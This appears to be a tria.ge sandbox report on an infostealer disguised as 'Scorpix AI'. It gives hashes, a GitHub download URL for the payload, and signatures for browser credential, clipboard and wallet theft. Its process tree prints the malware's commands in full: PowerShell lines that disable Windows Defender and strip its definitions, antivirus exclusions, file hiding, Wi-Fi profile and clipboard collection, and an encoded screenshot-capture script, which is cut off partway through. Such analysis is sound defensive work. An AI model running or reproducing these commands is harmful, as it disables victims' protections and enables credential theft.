Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
747s -
max time network
743s -
platform
windows11-21h2_x64 -
resource
win11-20240709-en -
resource tags
-
submitted
26/07/2024, 13:16
Errors
General
-
Target
Executor/Scorpix AI/Scorpix AI/AI.py
-
Size
1KB
-
MD5
a59bd19c247fad2e81999cccda24a143
-
SHA1
c1be586bfe4024759fa7a63b6ffe3f6792ed3aa1
-
SHA256
ab74799d9a03db16167adf36414f8a83bc66e8ce24221c050500167bf360a9fa
-
SHA512
059e674423a61ef622273a354f72ffafb989944f8ca667c430b49f8f5a5f410ec5873936531ba64eeb0649b2d41a7229e6020adcbf7d90ee72bcafc1c7b8ab9e
Malware Config
Extracted
https://github.com/booyaskas/Scorpoxe/releases/download/vypix/Scorpix.exe
Signatures
-
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Blocklisted process makes network request 4 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 14 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
-
Drops file in Drivers directory 6 IoCs
-
Clipboard Data 1 TTPs 4 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
-
Executes dropped EXE 8 IoCs
-
Loads dropped DLL 64 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
UPX packed file 64 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Drops file in System32 directory 2 IoCs
-
Enumerates processes with tasklist 1 TTPs 10 IoCs
-
Hide Artifacts: Hidden Files and Directories 1 TTPs 2 IoCs
-
Drops file in Windows directory 6 IoCs
-
Browser Information Discovery 1 TTPs
Enumerate browser information.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 4 IoCs
Adversaries may check for Internet connectivity on compromised systems.
-
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 4 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Detects videocard installed 1 TTPs 8 IoCs
Uses WMIC.exe to determine videocard installed.
-
Enumerates system info in registry 2 TTPs 6 IoCs
-
Gathers system information 1 TTPs 2 IoCs
Runs systeminfo.exe.
-
Kills process with taskkill 19 IoCs
-
Modifies Internet Explorer settings 1 TTPs 4 IoCs
-
Modifies data under HKEY_USERS 3 IoCs
-
Modifies registry class 64 IoCs
-
NTFS ADS 1 IoCs
-
Runs ping.exe 1 TTPs 2 IoCs
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 11 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 64 IoCs
-
Suspicious use of SendNotifyMessage 64 IoCs
-
Suspicious use of SetWindowsHookEx 2 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Views/modifies file attributes 1 TTPs 6 IoCs
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\Executor\Scorpix AI\Scorpix AI\AI.py"1⤵
- Modifies registry class
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Suspicious use of SetWindowsHookEx
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.106 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe8726cc40,0x7ffe8726cc4c,0x7ffe8726cc582⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1828,i,11126979096157152266,6432444390103450787,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=1824 /prefetch:22⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1796,i,11126979096157152266,6432444390103450787,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=1868 /prefetch:32⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2208,i,11126979096157152266,6432444390103450787,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=2220 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3076,i,11126979096157152266,6432444390103450787,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=3168 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3148,i,11126979096157152266,6432444390103450787,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=3276 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3560,i,11126979096157152266,6432444390103450787,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=3520 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4636,i,11126979096157152266,6432444390103450787,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=4720 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4152,i,11126979096157152266,6432444390103450787,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=4904 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=4412,i,11126979096157152266,6432444390103450787,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=4732 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=872,i,11126979096157152266,6432444390103450787,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=3376 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=4888,i,11126979096157152266,6432444390103450787,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=3068 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=4720,i,11126979096157152266,6432444390103450787,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=4560 /prefetch:82⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=4724,i,11126979096157152266,6432444390103450787,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=5124 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5280,i,11126979096157152266,6432444390103450787,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=3544 /prefetch:82⤵
- NTFS ADS
-
-
C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe"1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc1⤵
-
C:\Windows\System32\oobe\UserOOBEBroker.exeC:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding1⤵
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exeC:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe -Embedding1⤵
- System Location Discovery: System Language Discovery
-
C:\Users\Admin\Desktop\Release of V3\Scorpix.exe"C:\Users\Admin\Desktop\Release of V3\Scorpix.exe"1⤵
-
C:\Users\Admin\Desktop\Release of V3\Scorpix.exe"C:\Users\Admin\Desktop\Release of V3\Scorpix.exe"2⤵
- Drops file in Drivers directory
- Loads dropped DLL
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Release of V3\Scorpix.exe'"3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Release of V3\Scorpix.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "start bound.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\bound.exebound.exe4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\bound.exebound.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"6⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid7⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name7⤵
- Detects videocard installed
-
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Injected', 0, 'Message', 48+16);close()""3⤵
-
C:\Windows\system32\mshta.exemshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Injected', 0, 'Message', 48+16);close()"4⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"3⤵
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 24⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"3⤵
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 24⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\Desktop\Release of V3\Scorpix.exe""3⤵
- Hide Artifacts: Hidden Files and Directories
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\Desktop\Release of V3\Scorpix.exe"4⤵
- Views/modifies file attributes
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵
- Clipboard Data
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵
-
C:\Windows\system32\tree.comtree /A /F4⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"3⤵
- System Network Configuration Discovery: Wi-Fi Discovery
-
C:\Windows\system32\netsh.exenetsh wlan show profile4⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵
-
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"3⤵
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath4⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGM